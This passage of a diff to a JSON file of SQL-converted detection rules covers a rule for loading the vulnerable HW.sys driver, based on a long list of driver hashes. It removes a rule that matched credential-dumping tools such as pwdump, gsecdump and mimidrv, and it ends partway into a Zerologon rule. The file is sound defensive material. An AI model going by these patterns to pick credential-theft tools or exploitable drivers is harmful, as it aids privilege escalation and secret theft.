'79e2d37632c417138970b4feba91b7e10c2ea251c5efe3d1fc6fa0190f176b57', '3390919bb28d5c36cc348f9ef23be5fa49bfd81263eb7740826e4437cbe904cd', '58c071cfe72e9ee867bba85cbd0abe72eb223d27978d6f0650d0103553839b59', '607dc4c75ac7aef82ae0616a453866b3b358c6cf5c8f9d29e4d37f844306b97c', '358ac54be252673841a1d65bfc2fb6d549c1a4c877fa7f5e1bfa188f30375d69', 'd0bd1ae72aeb5f3eabf1531a635f990e5eaae7fdd560342f915f723766c80889', 'f85cca4badff17d1aa90752153ccec77a68ad282b69e3985fdc4743eaea85004', '6908ebf52eb19c6719a0b508d1e2128f198d10441551cbfb9f4031d382f5229f', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', 'de6bf572d39e2611773e7a01f0388f84fb25da6cba2f1f8b9b36ffba467de6fa', '950a4c0c772021cee26011a92194f0e58d61588f77f2873aa0599dff52a160c9', 
'36505921af5a09175395ebaea29c72b2a69a3a9204384a767a5be8a721f31b10', '6de84caa2ca18673e01b91af58220c60aecd5cccf269725ec3c7f226b2167492', 'ef86c4e5ee1dbc4f81cd864e8cd2f4a2a85ee4475b9a9ab698a4ae1cc71fbeb0', '478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '7cfa5e10dff8a99a5d544b011f676bc383991274c693e21e3af40cf6982adb8c', 'f596e64f4c5d7c37a00493728d8756b243cfdc11e3372d6d6dfeffc13c9ab960', '0aafa9f47acf69d46c9542985994ff5321f00842a28df2396d4a3076776a83cb', '131d5490ceb9a5b2324d8e927fea5becfc633015661de2f4c2f2375a3a3b64c6', '3124b0411b8077605db2a9b7909d8240e0d554496600e2706e531c93c931e1b5', '1b7fb154a7b7903a3c81f12f4b094f24a3c60a6a8cffca894c67c264ab7545fa', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497', '9c2f3e9811f7d0c7463eaa1ee6f39c23f902f3797b80891590b43bbe0fdf0e51', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c60fcff9c8e5243bbb22ec94618b9dcb02c59bb49b90c04d7d6ab3ebbd58dc3a', '4045ae77859b1dbf13972451972eaaf6f3c97bea423e9e78f1c2f14330cd47ca', 'a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '3f2fda9a7a9c57b7138687bbce49a2e156d6095dddabb3454ea09737e02c3fa5', 'f8965fdce668692c3785afa3559159f9a18287bc0d53abb21902895a8ecf221b', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', '5bc3994612624da168750455b363f2964e1861dba4f1c305df01b970ac02a7ae', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '0fd2df82341bf5ebb8a53682e60d08978100c01acb0bed7b6ce2876ada80f670', '8111085022bda87e5f6aa4c195e743cc6dd6a3a6d41add475d267dc6b105a69f', 'be03e9541f56ac6ed1e81407dcd7cc85c0ffc538c3c2c2c8a9c747edbcf13100', '47f08f7d30d824a8f4bb8a98916401a37c0fd8502db308aba91fe3112b892dcc', 
'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '7f375639a0df7fe51e5518cf87c3f513c55bc117db47d28da8c615642eb18bfa', 'a56c2a2425eb3a4260cc7fc5c8d7bed7a3b4cd2af256185f24471c668853aee8', 'a3e507e713f11901017fc328186ae98e23de7cea5594687480229f77d45848d8', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '9529efb1837b1005e5e8f477773752078e0a46500c748bc30c9b5084d04082e6', '2bbe65cbec3bb069e92233924f7ee1f95ffa16173fceb932c34f68d862781250', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '39cfde7d401efce4f550e0a9461f5fc4d71fa07235e1336e4f0b4882bd76550e', '984a77e5424c6d099051441005f2938ae92b31b5ad8f6521c6b001932862add7', 'db2a9247177e8cdd50fe9433d066b86ffd2a84301aa6b2eb60f361cfff077004', '30706f110725199e338e9cc1c940d9a644d19a14f0eb8847712cba4cacda67ab', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', '9f4ce6ab5e8d44f355426d9a6ab79833709f39b300733b5b251a0766e895e0e5', 'd92eab70bcece4432258c9c9a914483a2267f6ab5ce2630048d3a99e8cb1b482', 'e4a7da2cf59a4a21fc42b611df1d59cae75051925a7ddf42bf216cc1a026eadb', '525d9b51a80ca0cd4c5889a96f857e73f3a80da1ffbae59851e0f51bdfb0b6cd', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '4cff6e53430b81ecc4fae453e59a0353bcfe73dd5780abfc35f299c16a97998e', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', 'f8236fc01d4efaa48f032e301be2ebba4036b2cd945982a29046eca03944d2ae', '575e58b62afab094c20c296604dc3b7dd2e1a50f5978d8ee24b7dca028e97316', '3d9e83b189fcf5c3541c62d1f54a0da0a4e5b62c3243d2989afc46644056c8e3', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', 'c0d88db11d0f529754d290ed5f4c34b4dba8c4f2e5c4148866daabeab0d25f9c', '7e0124fcc7c95fdc34408cf154cb41e654dade8b898c71ad587b2090b1da30d7', '61a1bdddd3c512e681818debb5bee94db701768fc25e674fcad46592a3259bd0', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', 
'45abdbcd4c0916b7d9faaf1cd08543a3a5178871074628e0126a6eda890d26e0', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', '1e8b0c1966e566a523d652e00f7727d8b0663f1dfdce3b9a09b9adfaef48d8ee', 'e7af7bcb86bd6bab1835f610671c3921441965a839673ac34444cf0ce7b2164e', '93d873cdf23d5edc622b74f9544cac7fe247d7a68e1e2a7bf2879fad97a3ae63', 'a9706e320179993dade519a83061477ace195daa1b788662825484813001f526', '61d6e40601fa368800980801a662a5b3b36e3c23296e8ae1c85726a56ef18cc8', '47eaebc920ccf99e09fc9924feb6b19b8a28589f52783327067c9b09754b5e84', 'fd8669794c67b396c12fc5f08e9c004fdf851a82faf302846878173e4fbecb03', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', '07b6d69bafcfd767f1b63a490a8843c3bb1f8e1bbea56176109b5743c8f7d357', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', '99f4994a0e5bd1bf6e3f637d3225c69ff4cd620557e23637533e7f18d7d6cba1', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', 'ece0a900ea089e730741499614c0917432246ceb5e11599ee3a1bb679e24fd2c', '8ef0ad86500094e8fa3d9e7d53163aa6feef67c09575c169873c494ed66f057f', '36b9e31240ab0341873c7092b63e2e0f2cab2962ebf9b25271c3a1216b7669eb', '6b830ea0db6546a044c9900d3f335e7820c2a80e147b0751641899d1a5aa8f74', '9c10e2ec4f9ef591415f9a784b93dc9c9cdafa7c69602c0dc860c5b62222e449', '5b9623da9ba8e5c80c49473f40ffe7ad315dcadffc3230afdc9d9226d60a715a', 'fafa1bb36f0ac34b762a10e9f327dcab2152a6d0b16a19697362d49a31e7f566', 'e61a54f6d3869b43c4eceac3016df73df67cce03878c5a6167166601c5d3f028', 'f88ebb633406a086d9cca6bc8b66a4ea940c5476529f9033a9e0463512a23a57', '2aa1b08f47fbb1e2bd2e4a492f5d616968e703e1359a921f62b38b8e4662f0c4', '06508aacb4ed0a1398a2b0da5fa2dbf7da435b56da76fd83c759a50a51c75caf', 'cc383ad11e9d06047a1558ed343f389492da3ac2b84b71462aee502a2fa616c8', '845f1e228de249fc1ddf8dc28c39d03e8ad328a6277b6502d3932e83b879a65a', 
'01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', '64f9e664bc6d4b8f5f68616dd50ae819c3e60452efd5e589d6604b9356841b57', '2a652de6b680d5ad92376ad323021850dab2c653abf06edf26120f7714b8e08a', '85866e8c25d82c1ec91d7a8076c7d073cccf421cf57d9c83d80d63943a4edd94', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', 'bb50818a07b0eb1bd317467139b7eb4bad6cd89053fecdabfeae111689825955', '9bb09752cf3a464455422909edef518ac18fe63cf5e1e8d9d6c2e68db62e0c87', 'b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '1c8dfa14888bb58848b4792fb1d8a921976a9463be8334cff45cc96f1276049a', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', '5c1585b1a1c956c7755429544f3596515dfdf928373620c51b0606a520c6245a', 'f40435488389b4fb3b945ca21a8325a51e1b5f80f045ab019748d0ec66056a8b', '405472a8f9400a54bb29d03b436ccd58cfd6442fe686f6d2ed4f63f002854659', '3a95cc82173032b82a0ffc7d2e438df64c13bc16b4574214c9fe3be37250925e', '42579a759f3f95f20a2c51d5ac2047a2662a2675b3fb9f46c1ed7f23393a0f00', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '159e7c5a12157af92e0d14a0d3ea116f91c09e21a9831486e6dc592c93c10980', '5c04c274a708c9a7d993e33be3ea9e6119dc29527a767410dbaf93996f87369a', 'fcdfe570e6dc6e768ef75138033d9961f78045adca53beb6fdb520f6417e0df1', 'cb57f3a7fe9e1f8e63332c563b0a319b26c944be839eabc03e9a3277756ba612', '4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6', '80cbba9f404df3e642f22c476664d63d7c229d45d34f5cd0e19c65eb41becec3', '29e0062a017a93b2f2f5207a608a96df4d554c5de976bd0276c2590a03bd3e94', 'db90e554ad249c2bd888282ecf7d8da4d1538dd364129a3327b54f8242dd5653', '8dafe5f3d0527b66f6857559e3c81872699003e0f2ffda9202a1b5e29db2002e', 
'101402d4f5d1ae413ded499c78a5fcbbc7e3bae9b000d64c1dd64e3c48c37558', '6ed35f310c96920a271c59a097b382da07856e40179c2a4239f8daa04eef38e7', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '37dde6bd8a7a36111c3ac57e0ac20bbb93ce3374d0852bcacc9a2c8c8c30079e', '5d530e111400785d183057113d70623e17af32931668ab7c7fc826f0fd4f91a3', 'd7bc7306cb489fe4c285bbeddc6d1a09e814ef55cf30bd5b8daf87a52396f102', '7049f3c939efe76a5556c2a2c04386db51daf61d56b679f4868bb0983c996ebb', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '3243aab18e273a9b9c4280a57aecef278e10bfff19abb260d7a7820e41739099', '0040153302b88bee27eb4f1eca6855039e1a057370f5e8c615724fa5215bada3', 'f0605dda1def240dc7e14efa73927d6c6d89988c01ea8647b671667b2b167008', 'b1334a71cc73b3d0c54f62d8011bec330dfc355a239bf94a121f6e4c86a30a2e', '74a846c61adc53692d3040aff4c1916f32987ad72b07fe226e9e7dbeff1036c4', '7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6', 'c1c4310e5d467d24e864177bdbfc57cb5d29aac697481bfa9c11ddbeebfd4cc8', '22418016e980e0a4a2d01ca210a17059916a4208352c1018b0079ccb19aaf86a', '76b86543ce05540048f954fed37bdda66360c4a3ddb8328213d5aef7a960c184', 'dd4a1253d47de14ef83f1bc8b40816a86ccf90d1e624c5adf9203ae9d51d4097', '025e7be9fcefd6a83f4471bba0c11f1c11bd5047047d26626da24ee9a419cdc4', '50d5eaa168c077ce5b7f15b3f2c43bd2b86b07b1e926c1b332f8cb13bd2e0793', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '749b0e8c8c8b7dda8c2063c708047cfe95afa0a4d86886b31a12f3018396e67c', 'd8459f7d707c635e2c04d6d6d47b63f73ba3f6629702c7a6e0df0462f6478ae2', '49f75746eebe14e5db11706b3e58accc62d4034d2f1c05c681ecef5d1ad933ba', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', 'ae79e760c739d6214c1e314728a78a6cb6060cce206fde2440a69735d639a0a2', '4422851a0a102f654e95d3b79c357ae3af1b096d7d1576663c027cfbc04abaf9', '84df20b1d9d87e305c92e5ffae21b10b325609d59d835a954dbd8750ef5dabf4', '7a7e8df7173387aec593e4fe2b45520ea3156c5f810d2bb1b2784efd1c922376', 
'cd4a249c3ef65af285d0f8f30a8a96e83688486aab515836318a2559757a89bb', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '47f0cdaa2359a63ad1389ef4a635f1f6eee1f63bdf6ef177f114bdcdadc2e005', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1', '8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce', '36875562e747136313ec5db58174e5fab870997a054ca8d3987d181599c7db6a', '7877c1b0e7429453b750218ca491c2825dae684ad9616642eff7b41715c70aca', '591bd5e92dfa0117b3daa29750e73e2db25baa717c31217539d30ffb1f7f3a52', '04a85e359525d662338cae86c1e59b1d7aa9bd12b920e8067503723dc1e03162', '4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', 'e81230217988f3e7ec6f89a06d231ec66039bdba340fd8ebb2bbb586506e3293', '49c827cf48efb122a9d6fd87b426482b7496ccd4a2dbca31ebbf6b2b80c98530', 'd8b58f6a89a7618558e37afc360cd772b6731e3ba367f8d58734ecee2244a530', '7ec93f34eb323823eb199fbf8d06219086d517d0e8f4b9e348d7afd41ec9fd5d', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '89b0017bc30cc026e32b758c66a1af88bd54c6a78e11ec2908ff854e00ac46be', 'e005e8d183e853a27ad3bb56f25489f369c11b0d47e3d4095aad9291b3343bf1', '5f5e5f1c93d961985624768b7c676d488c7c7c1d4c043f6fc1ea1904fefb75be', 'cdd2a4575a46bada4837a6153a79c14d60ee3129830717ef09e0e3efd9d00812', 'ac3f613d457fc4d44fa27b2e0b1baa62c09415705efb5a40a4756da39b3ac165', '475e5016c9c0f5a127896f9179a1b1577a67b357f399ab5a1e68aab07134729a', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '0de4247e72d378713bcf22d5c5d3874d079203bb4364e25f67a90d5570bdcce8', 
'72b99147839bcfb062d29014ec09fe20a8f261748b5925b00171ef3cb849a4c1', 'cc586254e9e89e88334adee44e332166119307e79c2f18f6c2ab90ce8ba7fc9b', 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe', '5ee292b605cd3751a24e5949aae615d472a3c72688632c3040dc311055b75a92', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', 'f8886a9c759e0426e08d55e410b02c5b05af3c287b15970175e4874316ffaf13', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', '2da330a2088409efc351118445a824f11edbe51cf3d653b298053785097fe40e', '54841d9f89e195196e65aa881834804fe3678f1cf6b328cab8703edd15e3ec57', 'e6a7b0bc01a627a7d0ffb07faddb3a4dd96b6f5208ac26107bdaeb3ab1ec8217', 'cf4b5fa853ce809f1924df3a3ae3c4e191878c4ea5248d8785dc7e51807a512b', '6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1', '708016fbe22c813a251098f8f992b177b476bd1bbc48c2ed4a122ff74910a965', '362c4f3dadc9c393682664a139d65d80e32caa2a97b6e0361dfd713a73267ecc', '08eb2d2aa25c5f0af4e72a7e0126735536f6c2c05e9c7437282171afe5e322c6', '2d83ccb1ad9839c9f5b3f10b1f856177df1594c66cbbc7661677d4b462ebf44d', 'c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c', '4941c4298f4560fc1e59d0f16f84bab5c060793700b82be2fd7c63735f1657a8', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', '76fb4deaee57ef30e56c382c92abffe2cf616d08dbecb3368c8ee6b02e59f303', '3a5ec83fe670e5e23aef3afa0a7241053f5b6be5e6ca01766d6b5f9177183c25', '7196187fb1ef8d108b380d37b2af8efdeb3ca1f6eefd37b5dc114c609147216d', 'f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', 'b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3', 'fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8', 'd5586dc1e61796a9ae5e5d1ced397874753056c3df2eb963a8916287e1929a71', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', '6cb51ae871fbd5d07c5aad6ff8eea43d34063089528603ca9ceb8b4f52f68ddc', 
'6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '4a3d4db86f580b1680d6454baee1c1a139e2dde7d55e972ba7c92ec3f555dce2', 'dec8a933dba04463ed9bb7d53338ff87f2c23cfb79e0e988449fc631252c9dcc', '6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421', 'e83908eba2501a00ef9e74e7d1c8b4ff1279f1cd6051707fd51824f87e4378fa', '0ebaef662b14410c198395b13347e1d175334ec67919709ad37d65eba013adff', '3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c', '7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f', '9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395', 'aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79', '146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88', '9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b', 'cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', '436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7', 'b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf', 'b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469', '4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7', 'af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685', 'b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d', 
'ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41', '06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4', '4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', '4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe', '38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a', '56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7', '455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b', 'e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', 'b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414', 'dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22', '221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', '78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f', '7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457', 'd5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3', 'fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533', 'f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', 'dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8', '21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21', '91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c', '98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8', 'd25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26', '6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4', '3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5', '8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f', 
'1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f', '3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', 'b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a', '3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499', '509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', '09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1', '1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', '823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba', '05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', 'e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463', '9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b')))" ], - "filename": "win_system_rdp_potential_cve_2019_0708.yml" + "filename": "driver_load_win_vuln_drivers.yml" }, { - "title": "Credential Dumping Tools Service Execution - System", - "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "title": "Vulnerable HW Driver Load", + "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", "status": "experimental", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur 
Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN 
('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8')))" ], - "filename": "win_system_mal_creddumper.yml" + "filename": "driver_load_win_vuln_hw_driver.yml" }, { - "title": "Zerologon Exploitation Using Well-known Tools", - "id": "18f37338-b9bd-4117-a039-280c81f7a596", - "status": "stable", - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov 